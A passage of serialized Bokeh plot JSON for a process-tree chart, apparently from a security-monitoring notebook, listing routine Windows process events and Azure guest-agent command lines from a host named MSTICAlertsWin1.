ld\":\"Row\",\"transform\":{\"id\":\"2494\"}}},\"id\":\"2497\",\"type\":\"Text\"},{\"attributes\":{\"end\":76,\"start\":-1},\"id\":\"2508\",\"type\":\"Range1d\"},{\"attributes\":{\"coordinates\":null,\"formatter\":{\"id\":\"2558\"},\"group\":null,\"major_label_policy\":{\"id\":\"2559\"},\"ticker\":{\"id\":\"2519\"},\"visible\":false},\"id\":\"2518\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"2519\",\"type\":\"BasicTicker\"},{\"attributes\":{\"text\":{\"field\":\"__proc_name$$\"},\"text_alpha\":{\"value\":0.2},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"2485\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"2486\"}}},\"id\":\"2490\",\"type\":\"Text\"},{\"attributes\":{\"ticks\":[1,2,3,4]},\"id\":\"2501\",\"type\":\"FixedTicker\"},{\"attributes\":{\"coordinates\":null,\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"group\":null,\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"2544\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"coordinates\":null,\"formatter\":{\"id\":\"2561\"},\"group\":null,\"major_label_policy\":{\"id\":\"2562\"},\"ticker\":{\"id\":\"2515\"},\"visible\":false},\"id\":\"2514\",\"type\":\"LinearAxis\"},{\"attributes\":{\"axis_line_color\":null,\"coordinates\":null,\"formatter\":{\"id\":\"2471\"},\"group\":null,\"major_label_policy\":{\"id\":\"2472\"},\"major_label_standoff\":0,\"major_tick_line_color\":\"navy\",\"ticker\":{\"id\":\"2501\"},\"visible\":false},\"id\":\"2440\",\"type\":\"LinearAxis\"},{\"attributes\":{\"axis\":{\"id\":\"2518\"},\"coordinates\":null,\"dimension\":1,\"grid_line_color\":null,\"group\":null,\"ticker\":null},\"id\":\"2521\",\"type\":\"Grid\"},{\"attributes\":{\"source\":{\"id\":\"2427\"}},\"id\":\"2500\",\"type\":\"CDSView\"},{\"attributes\":{\"range\":{\"id\":\"2432\"},\"value\":1.75},\"id\":\"2459\",\"type\":\"Dodge\"},{\"attributes\":{\"bottom_units\":\"screen\",\"coordinates\":null,\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"group\":null,\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"2528\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"range\":{\"id\":\"2432\"},\"value\":2.2},\"id\":\"2493\",\"type\":\"Dodge\"},{\"attributes\":{\"below\":[{\"id\":\"2514\"}],\"center\":[{\"id\":\"2517\"},{\"id\":\"2521\"}],\"height\":700,\"left\":[{\"id\":\"2518\"}],\"renderers\":[{\"id\":\"2541\"}],\"title\":{\"id\":\"2550\"},\"toolbar\":{\"id\":\"2529\"},\"toolbar_location\":null,\"width\":90,\"x_range\":{\"id\":\"2506\"},\"x_scale\":{\"id\":\"2510\"},\"y_range\":{\"id\":\"2508\"},\"y_scale\":{\"id\":\"2512\"}},\"id\":\"2505\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"text\":{\"field\":\"__proc_id$$\"},\"text_alpha\":{\"value\":0.2},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"2493\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"2494\"}}},\"id\":\"2498\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"2525\",\"type\":\"SaveTool\"},{\"attributes\":{\"overlay\":{\"id\":\"2528\"}},\"id\":\"2524\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"text\":{\"field\":\"__proc_name$$\"},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"2485\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"2486\"}}},\"id\":\"2488\",\"type\":\"Text\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"2428\"}},\"hatch_alpha\":{\"value\":0.1},\"height\":{\"value\":0.8},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"2536\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"2539\",\"type\":\"Rect\"},{\"attributes\":{\"range\":null,\"value\":-0.5},\"id\":\"2536\",\"type\":\"Dodge\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"renderers\":[{\"id\":\"2464\"}],\"tooltips\":[[\"Process\",\"@NewProcessName\"],[\"PID\",\"@NewProcessId\"],[\"CmdLine\",\"@CommandLine\"],[\"SubjUser\",\"@SubjectUserName\"],[\"SubjLgnId\",\"@SubjectLogonId\"],[\"TgtLgnId\",\"@TargetLogonId\"],[\"Time\",\"@TimeGenerated{%F %T.%3N}\"]]},\"id\":\"2457\",\"type\":\"HoverTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"2428\"}},\"hatch_alpha\":{\"value\":0.2},\"height\":{\"value\":0.8},\"line_alpha\":{\"value\":0.2},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"2536\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"2540\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"2526\",\"type\":\"ResetTool\"},{\"attributes\":{\"range\":{\"id\":\"2434\"},\"value\":0.25},\"id\":\"2494\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"2522\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"2510\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"2559\",\"type\":\"AllLabels\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"2428\"}},\"height\":{\"value\":0.8},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"2536\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"2538\",\"type\":\"Rect\"},{\"attributes\":{\"ticks\":[1,2,3,4]},\"id\":\"2503\",\"type\":\"FixedTicker\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"2427\"},\"glyph\":{\"id\":\"2488\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"2490\"},\"nonselection_glyph\":{\"id\":\"2489\"},\"view\":{\"id\":\"2492\"}},\"id\":\"2491\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"source\":{\"id\":\"2427\"}},\"id\":\"2492\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"2506\",\"type\":\"DataRange1d\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"2427\"},\"glyph\":{\"id\":\"2496\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"2498\"},\"nonselection_glyph\":{\"id\":\"2497\"},\"view\":{\"id\":\"2500\"}},\"id\":\"2499\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"2515\",\"type\":\"BasicTicker\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"2427\"},\"glyph\":{\"id\":\"2538\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"2540\"},\"nonselection_glyph\":{\"id\":\"2539\"},\"view\":{\"id\":\"2542\"}},\"id\":\"2541\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"2558\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.4},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"2428\"}},\"height\":{\"value\":0.95},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"2459\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"2461\",\"type\":\"Rect\"},{\"attributes\":{\"coordinates\":null,\"group\":null},\"id\":\"2550\",\"type\":\"Title\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"ProcessTree\"},\"id\":\"2430\",\"type\":\"Title\"},{\"attributes\":{\"end\":7,\"start\":1},\"id\":\"2432\",\"type\":\"Range1d\"},{\"attributes\":{\"below\":[{\"id\":\"2440\"}],\"center\":[{\"id\":\"2443\"},{\"id\":\"2447\"},{\"id\":\"2475\"}],\"height\":700,\"left\":[{\"id\":\"2444\"}],\"outline_line_color\":null,\"renderers\":[{\"id\":\"2464\"},{\"id\":\"2483\"},{\"id\":\"2491\"},{\"id\":\"2499\"}],\"title\":{\"id\":\"2430\"},\"toolbar\":{\"id\":\"2452\"},\"toolbar_location\":\"above\",\"width\":900,\"x_range\":{\"id\":\"2432\"},\"x_scale\":{\"id\":\"2436\"},\"y_range\":{\"id\":\"2434\"},\"y_scale\":{\"id\":\"2438\"}},\"id\":\"2429\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"2436\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"2472\",\"type\":\"AllLabels\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"2427\"},\"glyph\":{\"id\":\"2480\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"2482\"},\"nonselection_glyph\":{\"id\":\"2481\"},\"view\":{\"id\":\"2484\"}},\"id\":\"2483\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"dimension\":\"height\"},\"id\":\"2451\",\"type\":\"WheelPanTool\"},{\"attributes\":{\"text\":{\"field\":\"__cmd_line$$\"},\"text_alpha\":{\"value\":0.2},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"2477\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"2478\"}}},\"id\":\"2482\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"2473\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"2428\"}},\"hatch_alpha\":{\"value\":0.2},\"height\":{\"value\":0.95},\"line_alpha\":{\"value\":0.2},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"2459\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"2463\",\"type\":\"Rect\"},{\"attributes\":{\"range\":{\"id\":\"2434\"},\"value\":0.25},\"id\":\"2486\",\"type\":\"Dodge\"},{\"attributes\":{\"callback\":null},\"id\":\"2450\",\"type\":\"TapTool\"},{\"attributes\":{\"source\":{\"id\":\"2427\"}},\"id\":\"2465\",\"type\":\"CDSView\"},{\"attributes\":{\"axis\":{\"id\":\"2444\"},\"coordinates\":null,\"dimension\":1,\"grid_line_color\":\"navy\",\"group\":null,\"ticker\":null,\"visible\":false},\"id\":\"2447\",\"type\":\"Grid\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"2427\"},\"glyph\":{\"id\":\"2461\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"2463\"},\"nonselection_glyph\":{\"id\":\"2462\"},\"view\":{\"id\":\"2465\"}},\"id\":\"2464\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"2468\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"axis\":{\"id\":\"2440\"},\"coordinates\":null,\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"group\":null,\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":{\"id\":\"2503\"}},\"id\":\"2443\",\"type\":\"Grid\"},{\"attributes\":{\"text\":{\"field\":\"__proc_name$$\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"2485\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"2486\"}}},\"id\":\"2489\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"2471\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"2469\",\"type\":\"AllLabels\"},{\"attributes\":{\"range\":{\"id\":\"2434\"},\"value\":-0.2},\"id\":\"2478\",\"type\":\"Dodge\"},{\"attributes\":{\"active_scroll\":{\"id\":\"2451\"},\"tools\":[{\"id\":\"2448\"},{\"id\":\"2449\"},{\"id\":\"2450\"},{\"id\":\"2451\"},{\"id\":\"2457\"}]},\"id\":\"2452\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"2445\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"2448\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"2474\",\"type\":\"Selection\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"items\":[{\"id\":\"2476\"}],\"label_text_font_size\":\"7pt\",\"title\":\"SubjectUserName\"},\"id\":\"2475\",\"type\":\"Legend\"},{\"attributes\":{\"source\":{\"id\":\"2427\"}},\"id\":\"2484\",\"type\":\"CDSView\"},{\"attributes\":{\"text\":{\"field\":\"__cmd_line$$\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"2477\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"2478\"}}},\"id\":\"2481\",\"type\":\"Text\"},{\"attributes\":{\"label\":{\"field\":\"SubjectUserName\"},\"renderers\":[{\"id\":\"2464\"}]},\"id\":\"2476\",\"type\":\"LegendItem\"},{\"attributes\":{\"range\":{\"id\":\"2432\"},\"value\":0.1},\"id\":\"2485\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"2449\",\"type\":\"SaveTool\"},{\"attributes\":{\"text\":{\"field\":\"__cmd_line$$\"},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"2477\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"2478\"}}},\"id\":\"2480\",\"type\":\"Text\"},{\"attributes\":{\"data\":{\"Account\":[\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"CommandLine\":[\"nan\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -startPoll C:\\\\WindowsAzure\\\\Logs\\\\ 168.63.129.16 5248000 900000 21600000\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -startPoll C:\\\\WindowsAzure\\\\Logs\\\\ 168.63.129.16 5248000 900000 21600000\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -startPoll C:\\\\WindowsAzure\\\\Logs\\\\ 168.63.129.16 5248000 900000 21600000\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EffectiveLogonId\":[\"0x3e7\",\"0x3e7\",\"0